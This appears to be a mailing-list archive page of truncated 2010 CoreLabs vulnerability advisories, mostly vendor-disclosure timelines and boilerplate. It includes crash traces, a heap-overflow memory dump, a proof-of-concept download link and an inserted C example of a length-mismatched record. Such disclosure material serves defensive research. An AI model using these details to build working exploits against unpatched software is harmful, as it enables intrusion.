Core Security Technologies asks for a security contact in upstream
stating that finding a reliable one using Google or looking at mailing
lists was difficult.

. 2010-09-06:
Vincent Bernat, the Debian Package Maintainer for libsmi, replies with
the e-mail addresses of two alleged developers of libsmi, Juergen
Schoenwaelder and Frank Strauss.

. 2010-09-07:
Core Security Technologies contacts Juergen Schoenwaelder and Frank
Strauss at the supplied e-mail addresses, informing them of the
vulnerability found and offering an advisory draft in either plain or
encrypted form.

. 2010-09-07:
Frank Strauss' address bounces Core Security Technologies' e-mail back,
with a notice giving a new e-mail address. Core Security Technologies
sends the message again to the new address.

. 2010-09-07:
Juergen Schoenwaelder replies with his PGP keys, and copies Vincent
Bernat again in the conversation.

. 2010-09-09:
Core Security Technologies sends an encrypted draft of this advisory
to Juergen Schoenwaelder and Vincent Bernat, with apologies for the
delay caused by Pedro Varangot
[http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=researcher&name=Pedro_Varangot]
being on leave due to health issues. The advisory draft mentions
Net-SNMP as possibly vulnerable software.

. 2010-09-11:
Juergen Schoenwaelder replies with a patch fixing the vulnerability,
and corrects some technical information in the advisory draft
regarding the impact of the vulnerability, stating that it is likely
low and that Net-SNMP is not affected.

. 2010-09-27:
Core Security Technologies replies to Juergen Schoenwaelder and
Vincent Bernat agreeing that the impact of the vulnerability is low
and removes the mention of Net-SNMP from the advisory. Core Security
Technologies asks for a timeline regarding the release of a fixed
version of libsmi, stating that this advisory will be released anyway,
because someone may be using libsmi in their software, introducing a
vulnerability they may not know about. No reply is received for this
e-mail.

. 2010-10-04:
Core Security Technologies notifies Juergen Schoenwaelder and Vincent
Bernat that October the 18th has been set as a tentative release date
for this advisory, and that the release date is open to discussion if
commitment to release a fixed version of libsmi in a given timeframe
is given.

. 2010-10-08:
Juergen Schoenwaelder replies with suggestions for the vulnerable
packages and vendor information section of this advisory. He also
mentions that Core Security Technologies should go with the October
18th release date for this advisory.

. 2010-10-08:
Core Security Technologies incorporates Juergen Schoenwaelder's
suggestions into the advisory, and again mentions that the advisory can
be rescheduled if the vendor deems it necessary.

. 2010-10-20:
Advisory CORE-2010-0819 is released.


10. *References*

[1] [http://www.ibr.cs.tu-bs.de/projects/libsmi/]
[2] [http://www.ibr.cs.tu-bs.de/projects/libsmi/libsmi.html]


11. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is
charged with anticipating the future needs and requirements for
information security technologies. We conduct our research in several
important areas of computer security including system vulnerabilities,
cyber attack planning and simulation, source code auditing, and
cryptography. Our results include problem formalization,
identification of vulnerabilities, novel solutions and prototypes for
new technologies. CoreLabs regularly publishes security advisories,
technical papers, project information and shared software tools for
public use at: [http://corelabs.coresecurity.com/].


12. *About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources
are exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and
software security auditing. Based in Boston, MA and Buenos Aires,
Argentina, Core Security Technologies can be reached at 617-399-6980
or on the Web at [http://www.coresecurity.com].


13. *Disclaimer*

The contents of this advisory are copyright (c) 2010 Core Security
Technologies and (c) 2010 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: [http://creativecommons.org/licenses/by-nc-sa/3.0/us/]


14. *PGP/GPG Keys*

This advisory has been signed with the

[Full-disclosure] CORE-2010-0517 - Microsoft Office HtmlDlgHelper class memory corruption

2010-10-14 Thread CORE Security Technologies Advisories
nd included an invalid
detail in the last status update. In particular, the issue does not
affect the SafeHTML update scheduled for October but it will be shipping
in the IE Cumulative Update scheduled for October.

. 2010-10-01:
Core acknowledges the MSRC's e-mail and notifies that although the
problem is located in IE-owned code, the problem also affects Office up
to 2010. Core assumes this will be specified in the MSRC bulletin and
asks for confirmation.

. 2010-10-04:
MSRC confirms that the description of the vulnerability calls out that
the vector to the vulnerability is through opening a Word document.

. 2010-10-12:
Advisory CORE-2010-0517 is published.


9. *References*

[1] Microsoft security bulletin summary for October 2010 -
[http://www.microsoft.com/technet/security/bulletin/ms10-oct.mspx].
[2] Office killbit [http://support.microsoft.com/kb/983632].
[3] This bug was originally investigated in Microsoft Office by Core,
but MSRC determined [2010-07-02] that this bug is an exploitable crash
in Internet Explorer.
[4] MSRC was not able to reproduce this issue on IE6; however, they
notified that the code has been determined to exist in this version and
the fix will be scoped to address this platform as well.


10. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
[http://corelabs.coresecurity.com/].


11. *About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
[http://www.coresecurity.com].


12. *Disclaimer*

The contents of this advisory are copyright (c) 2010 Core Security
Technologies and (c) 2010 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: [http://creativecommons.org/licenses/by-nc-sa/3.0/us/]


13. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
[http://www.coresecurity.com/files/attachments/core_security_advisories.asc].






[Full-disclosure] [CORE-2010-0624] MS OpenType CFF Parsing Vulnerability

2010-10-12 Thread Core Security Technologies Advisories
ed.

. 2010-10-07:
Core sends the draft advisory.

. 2010-10-08:
MSRC acknowledges the advisory text, and confirms that the vulnerability
is locally exploitable.

. 2010-10-12:
Advisory CORE-2010-0624 is published.


10. *References*


11. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
[http://corelabs.coresecurity.com/].


12. *About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
[http://www.coresecurity.com].


13. *Disclaimer*

The contents of this advisory are copyright (c) 2010 Core Security
Technologies and (c) 2010 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: [http://creativecommons.org/licenses/by-nc-sa/3.0/us/]


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
[http://www.coresecurity.com/files/attachments/core_security_advisories.asc].
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEYEARECAAYFAky0jIYACgkQyNibggitWa2G7gCgndqT2EjZ7++mvRK6DzmKP4Rt
tH0AoJ7mgNjoAdvCll0iRFI7QHRSG2wK
=WNYa
-----END PGP SIGNATURE-----



[Full-disclosure] (CORE-2010-0701) Adobe Acrobat Reader Acrord32.dll Use After Free Vulnerability

2010-10-06 Thread CORE Security Technologies Advisories
 problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
[http://www.coresecurity.com/corelabs].


11. *About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
[http://www.coresecurity.com].


12. *Disclaimer*

The contents of this advisory are copyright (c) 2010 Core Security
Technologies and (c) 2010 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: [http://creativecommons.org/licenses/by-nc-sa/3.0/us/]


13. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
[http://www.coresecurity.com/files/attachments/core_security_advisories.asc].

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.12 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEYEARECAAYFAkystXYACgkQyNibggitWa33EQCfT55LUL5PG2WUscpSikemiVeY
yNMAnjhSH0EitGnENPDAbWJz3+JiZXPh
=nN2s
-----END PGP SIGNATURE-----



[Full-disclosure] CORE-2010-0407: Microsoft Office Excel PivotTable Cache Data Record Buffer Overflow

2010-08-10 Thread CORE Security Technologies Advisories
rity Technologies can be reached at 617-399-6980 or on the Web at
[http://www.coresecurity.com].


13. *Disclaimer*

The contents of this advisory are copyright (c) 2010 Core Security
Technologies and (c) 2010 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: [http://creativecommons.org/licenses/by-nc-sa/3.0/us/]


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
[http://www.coresecurity.com/files/attachments/core_security_advisories.asc].

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)

iEYEARECAAYFAkxhsvMACgkQyNibggitWa3SZQCeIQ9oxM48E4FXX2yxcKW+XFts
1jMAoKvDR2SVz6mTGp7S44g5s9AMQlx7
=Z2wt
-----END PGP SIGNATURE-----



[Full-disclosure] [CORE-2010-0623] Microsoft Windows CreateWindow function callback vulnerability

2010-08-10 Thread CORE Security Technologies Advisories
uesday is due. Core also
informs that reliable exploitation of this bug has been achieved and
restates that August should be a final date, because this vulnerability
has probably already been discovered by anyone with the technical
knowledge to reverse engineer MS10-032. Core also asks Microsoft for
information on affected platforms.

. 2010-07-23:
Microsoft confirms that the patch will be issued on August 10th, for
all supported versions of Microsoft Windows.

. 2010-08-04:
Core asks Microsoft for data regarding their future security bulletin
in order to include it in the vendor section of this advisory.

. 2010-08-04:
Microsoft replies with the data Core asked for, and mentions that, if
possible, they would like to see an advisory draft. Microsoft also
asks for confirmation on credits for the acknowledgement section of
their report.

. 2010-08-04:
Core replies with a draft of this advisory and a minor correction
regarding an accent mark on the credits for the acknowledgement section.

. 2010-08-09:
Core sends a more polished draft for the advisory.

. 2010-08-10:
Microsoft acknowledges the advisory draft and the minor correction
regarding the accent mark.

. 2010-08-10:
Microsoft Security Bulletin MS10-048 is published.

. 2010-08-10:
Advisory CORE-2010-0623 is published.


10. *References*

[1] Microsoft Security Bulletin MS10-032
[http://www.microsoft.com/technet/security/bulletin/ms10-032.mspx]


11. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is
charged with anticipating the future needs and requirements for
information security technologies. We conduct our research in several
important areas of computer security including system vulnerabilities,
cyber attack planning and simulation, source code auditing, and
cryptography. Our results include problem formalization,
identification of vulnerabilities, novel solutions and prototypes for
new technologies. CoreLabs regularly publishes security advisories,
technical papers, project information and shared software tools for
public use at: [http://corelabs.coresecurity.com/].


12. *About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources
are exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and
software security auditing. Based in Boston, MA and Buenos Aires,
Argentina, Core Security Technologies can be reached at 617-399-6980
or on the Web at [http://www.coresecurity.com].


13. *Disclaimer*

The contents of this advisory are copyright (c) 2010 Core Security
Technologies and (c) 2010 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: [http://creativecommons.org/licenses/by-nc-sa/3.0/us/]


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
[http://www.coresecurity.com/files/attachments/core_security_advisories.asc].

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)
Comment: GnuPT v3.6.3
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEYEARECAAYFAkxhpQ0ACgkQyNibggitWa3Q7gCfVgpuM7KDIIZ30RhJ9zPCOhl+
37IAoLMnTLUuZbvGpDlpjqmft5z0AFZ+
=ECTt
-----END PGP SIGNATURE-----



Re: [Full-disclosure] [CORE-2010-0405] Adobe Director Invalid Read

2010-08-06 Thread Core Security Technologies Advisories
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

  Core Security Technologies - CoreLabs Advisory
   http://corelabs.coresecurity.com/

Adobe Director DIRAPI.DLL Invalid Read Vulnerability

Additional research on this vulnerability was performed by Core Security
Technologies researchers. Updated technical information has been
published at:

http://www.coresecurity.com/content/adobe-director-memory-corruption

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEYEARECAAYFAkxcU2UACgkQyNibggitWa2xrQCgo5BWGlgA8VC4drNpdLlNT4uX
HdEAoJNiuBrGAt7eKMdhDhSmTIDNbvwx
=hLcP
-----END PGP SIGNATURE-----



[Full-disclosure] [CORE-2010-0608] HP OpenView NNM OvJavaLocale Buffer Overflow Vulnerability

2010-08-03 Thread CORE Security Technologies Advisories
ious organizations worldwide develop and maintain a proactive 
process for securing their networks. The company's flagship product, CORE 
IMPACT, is the most comprehensive product for performing enterprise security 
assurance testing. CORE IMPACT evaluates network, endpoint and end-user 
vulnerabilities and identifies what resources are exposed. It enables 
organizations to determine if current security investments are detecting and 
preventing attacks. Core Security Technologies augments its leading technology 
solution with world-class security consulting services, including penetration 
testing and software security auditing. Based in Boston, MA and Buenos Aires, 
Argentina, Core Security Technologies can be reached at 617-399-6980 or on the 
Web at [http://www.coresecurity.com].


13. *Disclaimer*

The contents of this advisory are copyright (c) 2010 Core Security Technologies 
and (c) 2010 CoreLabs, and are licensed under a Creative Commons Attribution 
Non-Commercial Share-Alike 3.0 (United States) Licence: 
[http://creativecommons.org/licenses/by-nc-sa/3.0/us/]


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security Technologies 
advisories team, which is available for download at 
[http://www.coresecurity.com/files/attachments/core_security_advisories.asc].

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)
Comment: GnuPT v3.6.3
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEYEARECAAYFAkxYb4AACgkQyNibggitWa2juACcDs20mlODxEt60A6IH2vTVeWS
Hs0AnjldjfUIwiNNQSumvp/h8bEq7yXL
=oYbV
-----END PGP SIGNATURE-----



[Full-disclosure] CORE-2010-0316 - Novell iManager Multiple Vulnerabilities

2010-06-23 Thread CORE Security Technologies Advisories
d of the day and
this deadline should be considered as final. No reply received.

. 2010-06-02:
The advisory CORE-2010-0316 is published.

. 2010-06-02:
The iManager team notifies that both bugs have been reproduced and that
they are going to develop fixes for both issues. The iManager team also
notifies that it has not decided whether it will issue patches for the
vulnerable versions of iManager currently in use or just roll the fixes
into the upcoming release of a new iManager version.

. 2010-06-02:
Core removes the advisory from its website and notifies that it was
published for about 20 minutes. Core also notifies that there will be a
meeting of the Core Advisories Team tomorrow (Thursday 3rd) at 19:30 GMT
in order to evaluate this case. If the iManager team does not intend to
release patches, there is no good reason to postpone the advisory
publication until Aug 2010.

. 2010-06-03:
The iManager team notifies of the plan to release iManager 2.7.3 ftf4 to
fix these 2 issues and another issue. iManager 2.7.3 ftf4 would be
released before August, but there is no date yet.

. 2010-06-03:
Core agrees to postpone the advisory publication, waiting for the 2.7.3
ftf4 release. The advisory is re-scheduled for publication on Monday,
June 21st, 2010. Core notifies that this date can be moved if the
iManager team needs it, but the iManager team should provide a clear
report about the progress of the fixing process in order to request
moving the release date.

. 2010-06-15:
Core requests a status update from the iManager team.

. 2010-06-17:
Core requests a status update from the iManager team and notifies that
the advisory will be released next Monday as planned.

. 2010-06-18:
The iManager team notifies that they are waiting on a response from
another Novell product that ships with iManager, to make sure it will
also be able to consume the new version of iManager and release before
August. The iManager team also notifies that they will contact Core with
the timeline today.

. 2010-06-23:
The advisory CORE-2010-0316 is published.



10. *References*

[1] Novell iManager:
[http://www.novell.com/products/consoles/imanager/overview.html].


11. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is
charged with anticipating the future needs and requirements for
information security technologies. We conduct our research in several
important areas of computer security including system vulnerabilities,
cyber attack planning and simulation, source code auditing, and
cryptography. Our results include problem formalization,
identification of vulnerabilities, novel solutions and prototypes for
new technologies. CoreLabs regularly publishes security advisories,
technical papers, project information and shared software tools for
public use at: [http://www.coresecurity.com/corelabs].


12. *About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources
are exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and
software security auditing. Based in Boston, MA and Buenos Aires,
Argentina, Core Security Technologies can be reached at 617-399-6980
or on the Web at [http://www.coresecurity.com].


13. *Disclaimer*

The contents of this advisory are copyright (c) 2010 Core Security
Technologies and (c) 2010 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper
credit is given.


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
[http://www.coresecurity.com/files/attachments/core_security_advisories.asc].

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEYEARECAAYFAkwifQUACgkQyNibggitWa1meQCfX8hLENduIFbfOtEAh08CDEUb
rJwAoIU+v/I4bPYp5f37zN5R/KKJ5ffB
=OoGO
-----END PGP SIGNATURE-----



[Full-disclosure] CORE-2010-0514: XnView MBM Processing Heap Overflow

2010-06-14 Thread CORE Security Technologies Advisories
618  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
01355628  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
01355638  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
01355648  41 41 41 41 41 41 41 41 EE FE EE FE EE FE EE FE

- -/


The error is the following: since it copies DWORDs, instead of copying
0x1E bytes, it should have copied 0x0F bytes (0x1E / 2). Finally, the
heap block is allocated in this part of the code:

/-
005AC5F7  56             PUSH ESI                                   // Heap Size
005AC5F8  6A 08          PUSH 8                                     // HEAP_ZERO_MEMORY
005AC5FA  FF35 A4347900  PUSH DWORD PTR DS:[7934A4]                 // Heap
005AC600  FF15 84726E00  CALL DWORD PTR DS:[<&KERNEL32.HeapAlloc>]  ; ntdll.RtlAllocateHeap

- -/
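The allocation/copy unit mismatch described above, as an added C example that is not from the advisory or from XnView: a hypothetical length-prefixed record with 16-bit elements (chosen so that the element count is the byte count divided by 2, as in the text; the real MBM layout is not reproduced), parsed so that the declared byte length is checked against the element size and against the bytes actually present before the heap block is allocated, next to a function that only computes how far a copy counted in elements would overrun a block sized in bytes.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical record layout used only for this illustration:
 * a 16-bit little-endian byte count, followed by that many bytes of
 * 16-bit little-endian elements. It is NOT the real MBM format. */
#define ELEM_SIZE 2u

/* The defect in the abstract: the copy loop counts in elements while the
 * allocation counts in bytes, so a block of nbytes bytes receives
 * nbytes * ELEM_SIZE bytes. Returns how many bytes would land past the
 * end of such a block; no memory is touched. For 0x1E this is 0x1E. */
size_t overrun_bytes(size_t nbytes)
{
    return nbytes * ELEM_SIZE - nbytes;
}

/* Hardened parse: rejects a length that is not a whole number of
 * elements or that exceeds the bytes actually present, allocates exactly
 * nbytes, and copies exactly nbytes / ELEM_SIZE elements into it.
 * Returns the element count and stores the block in *out (caller frees),
 * or returns (size_t)-1 with *out == NULL on malformed input. */
size_t parse_samples(const uint8_t *buf, size_t len, uint16_t **out)
{
    *out = NULL;
    if (len < 2)
        return (size_t)-1;               /* no room for the header */
    size_t nbytes = (size_t)buf[0] | ((size_t)buf[1] << 8);
    if (nbytes % ELEM_SIZE != 0)
        return (size_t)-1;               /* not a whole number of elements */
    if (nbytes > len - 2)
        return (size_t)-1;               /* header claims more than is present */
    size_t count = nbytes / ELEM_SIZE;   /* 0x1E bytes -> 0x0F elements */
    uint16_t *block = malloc(nbytes == 0 ? 1 : nbytes);
    if (block == NULL)
        return (size_t)-1;
    const uint8_t *p = buf + 2;
    for (size_t i = 0; i < count; i++, p += ELEM_SIZE)
        block[i] = (uint16_t)(p[0] | (p[1] << 8));
    *out = block;
    return count;
}

/* Builds a constructed record into dst: a header declaring `declared`
 * bytes followed by `payload` filler bytes (0x41). Returns the record
 * length, or 0 if dst is too small. declared != payload models a file
 * whose header lies about how much data follows. */
size_t make_record(uint8_t *dst, size_t cap, uint16_t declared, size_t payload)
{
    if (cap < 2 + payload)
        return 0;
    dst[0] = (uint8_t)(declared & 0xFF);
    dst[1] = (uint8_t)(declared >> 8);
    memset(dst + 2, 0x41, payload);
    return 2 + payload;
}

int main(void)
{
    uint8_t rec[64];
    uint16_t *samples = NULL;
    size_t n = make_record(rec, sizeof rec, 0x1E, 0x1E);
    size_t count = parse_samples(rec, n, &samples);
    printf("declared 0x1E bytes -> %zu elements; an element-counted copy "
           "would overrun a 0x1E-byte block by %zu bytes\n",
           count, overrun_bytes(0x1E));
    free(samples);
    return 0;
}
```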



9. *Report Timeline*

. 2010-05-27:
Core Security Technologies notifies XnView of the vulnerability.

. 2010-05-27:
The XnView author acknowledges receipt of the notification.

. 2010-05-27:
Core sends a technical description of the vulnerability, and a
Proof-of-Concept file that triggers the bug.

. 2010-05-28:
The XnView author notifies Core that the vulnerability has been fixed,
and that a fixed version will be released.

. 2010-06-02:
Core asks XnView when the fixed version will be released, in order to
coordinate the publication of the advisory with the release of a fixed
version.

. 2010-06-03:
The XnView author responds that version 1.97.5 will be available in 2
weeks.

. 2010-06-03:
Core requests a more precise date for the release, and reschedules
publication of its advisory to June 14th, 2010.

. 2010-06-07:
The XnView author responds that the update will be available on June 14th.

. 2010-06-10:
Core sends a second Proof-of-Concept, and asks the XnView author if it
triggers a different vulnerability.

. 2010-06-11:
The XnView author responds that the second PoC triggers the same
vulnerability.

. 2010-06-14:
Advisory CORE-2010-0514 is published.



10. *References*

[1] XnView website
[http://www.xnview.com/]
[2] Proof of Concept files
[http://www.coresecurity.com/files/attachments/CORE-2010-0514-Xnview-PoCs.rar]
[3] MBM file format
[http://software.frodo.looijaard.name/psiconv/formats/MBM_File.html]
[4] Basic elements: LListL
[http://software.frodo.looijaard.name/psiconv/formats/Basic_Elements.html#LListL]
[5] Paint Data Section
[http://software.frodo.looijaard.name/psiconv/formats/Paint_Data_Section.html#Paint%20Data%20Section]


13. *Disclaimer*

The contents of this advisory are copyright (c) 2010 Core Security
Technologies and (c) 2010 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
[http://www.coresecurity.com/files/attachments/core_security_advisories.asc].



[Full-disclosure] [CORE-2010-0415] SQL Injection in CubeCart PHP Free & Commercial Shopping Cart Application

2010-06-08 Thread CORE Security Technologies Advisories


13. *Disclaimer*

The contents of this advisory are copyright (c) 2010 Core Security
Technologies and (c) 2010 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper
credit is given.


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
[http://www.coresecurity.com/files/attachments/core_security_advisories.asc].



Re: [Full-disclosure] [CORE-2010-0405] Adobe Director Invalid Read

2010-05-13 Thread Core Security Technologies Advisories

Core Security Technologies Advisories

Errata:

The vulnerability in advisory CORE-2010-0405 was incorrectly described
as an Invalid read, when it is really a Memory corruption vulnerability.

Updated Title:
Adobe Director DIRAPI.DLL Memory Corruption Vulnerability

Updated URL:
http://www.coresecurity.com/content/adobe-director-memory-corruption



[Full-disclosure] [CORE-2010-0405] Adobe Director Invalid Read

2010-05-11 Thread Core Security Technologies Advisories Team
B8   0012F5EC Arg2 = 0012F5EC
0012E6BC    Arg3 = 
0012E6C0   001A Arg4 = 001A
0012E6DC   2018BB23   Director.2018BB1E
0012E83C   2027E776   ? Director.2018BAB0  Director.2027E771
- -/



9. *Report Timeline*

. 2010-04-14:
Vendor contacted.

. 2010-04-14:
Vendor requests PoC file.

. 2010-04-14:
Core replies with the PoC file and the draft advisory.

. 2010-04-14:
Adobe replies that it will investigate the issue and sets a preliminary
release date for June/July.

. 2010-04-15:
Core agrees with the preliminary release date.

. 2010-04-28:
Core requests an update on the situation, and asks whether Adobe was
able to confirm if the bug is exploitable.

. 2010-04-28:
Adobe replies that the issue was investigated and is scheduled to be
fixed in the next release of Adobe Shockwave Player, planned for May;
they did not carry out further exploitability research.

. 2010-04-28:
Core requests a specific publication date for the fix.

. 2010-05-06:
Adobe informs Core that the release date for the fix has been set to May
11th.

. 2010-05-07:
Core asks Adobe if they want to provide the text for the "Solutions and
Workarounds" section of the advisory.

. 2010-05-07:
Adobe replies with the text for the "Solutions and Workarounds" section
of the advisory.

. 2010-05-11:
Advisory published.



10. *References*

[1] Adobe Security Bulletin [http://www.adobe.com/go/apsb10-12/].


13. *Disclaimer*

The contents of this advisory are copyright (c) 2010 Core Security
Technologies and (c) 2010 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
[http://www.coresecurity.com/files/attachments/core_security_advisories.asc].



[Full-disclosure] [CORE-2010-0427] Windows SMTP Service DNS query Id vulnerabilities

2010-05-04 Thread Core Security Technologies Advisories
, 2007.
[http://www.trusteer.com/files/BIND_9_DNS_Cache_Poisoning.pdf]
[7] Klein, Amit, "Windows DNS Server cache poisoning", 2007.
[http://www.trusteer.com/files/Windows_DNS_Cache_Poisoning.pdf]
[8] Kaminsky, Dan, "Black Ops 2008: It's The End Of The Cache As We Know
It", 2008.
[http://www.blackhat.com/presentations/bh-jp-08/bh-jp-08-Kaminsky/BlackHat-Japan-08-Kaminsky-DNS08-BlackOps.pdf]
[9] Hubert, A., van Mook, R., "Measures for Making DNS More Resilient
against Forged Answers", RFC-5452, 2009.
[http://tools.ietf.org/html/rfc5452]


13. *Disclaimer*

The contents of this advisory are copyright (c) 2010 Core Security
Technologies and (c) 2010 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
[http://www.coresecurity.com/files/attachments/core_security_advisories.asc].



[Full-disclosure] [CORE-2010-0428] Microsoft Office Visio DXF File Insertion Buffer Overflow

2010-05-04 Thread Core Security Technologies Advisories Team


13. *Disclaimer*

The contents of this advisory are copyright (c) 2010 Core Security
Technologies and (c) 2010 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
[http://www.coresecurity.com/files/attachments/core_security_advisories.asc].



[Full-disclosure] CORE-2010-0406 - User Invoices Persistent XSS Vulnerability in CactuShop

2010-04-21 Thread CORE Security Technologies Advisories


12. *Disclaimer*

The contents of this advisory are copyright (c) 2010 Core Security
Technologies and (c) 2010 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper
credit is given.


13. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
[http://www.coresecurity.com/files/attachments/core_security_advisories.asc].



[Full-disclosure] CORE-2010-0323: XSS Vulnerability in NextGEN Gallery Wordpress Plugin

2010-04-06 Thread CORE Security Technologies Advisories


13. *Disclaimer*

The contents of this advisory are copyright (c) 2009 Core Security
Technologies and (c) 2009 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper
credit is given.


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.



